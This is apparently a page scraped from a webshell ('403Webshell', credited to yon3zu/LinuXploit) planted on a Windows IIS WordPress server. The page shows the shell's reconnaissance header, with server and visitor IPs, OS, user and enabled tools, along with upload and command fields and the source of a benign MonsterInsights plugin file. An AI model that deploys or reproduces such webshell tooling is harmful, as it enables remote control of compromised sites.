403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/wst2024/wp-content/plugins/google-analytics-premium/includes/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/wst2024/wp-content/plugins/google-analytics-premium/includes/admin/reporting.php
<?php
/**
 * MonsterInsights Reporting.
 *
 * Handles aggregating data.
 *
 * @since 7.0.0
 *
 * @package MonsterInsights
 * @subpackage GA Reporting
 * @author  Chris Christoff
 */

// Exit if accessed directly
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

final class MonsterInsights_Reporting {

	public $reports = array();

	public function __construct( ) {

	}

	public function add_report( $report = false ){
		if ( empty( $report ) || ! is_object( $report ) ) {
			return;
		}

		if ( version_compare( $report->version, '1.0.0', '<' ) ) {
			return;
		}

		$this->reports[] = $report;
	}

	public function get_aggregate_data() {
		if ( ! empty( $this->reports ) ) {
			foreach ( $this->reports as $report ) {
				$report->get_data( array( 'default' => true ) );
			}
		}
	}

	// $where possible values: auto, site, network, both
	public function delete_aggregate_data( $where = 'site' ) {
		if ( ! empty( $this->reports ) ) {
			foreach ( $this->reports as $report ) {
				$report->delete_cache( $where );
			}
		}
	}

	public function get_report( $name = '' ) {
		if ( empty( $name ) || empty( $this->reports ) ) {
			return false;
		}

		foreach ( $this->reports as $report ) {
			if ( $name === $report->name ) {
				return $report;
			}
		}
		return false;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit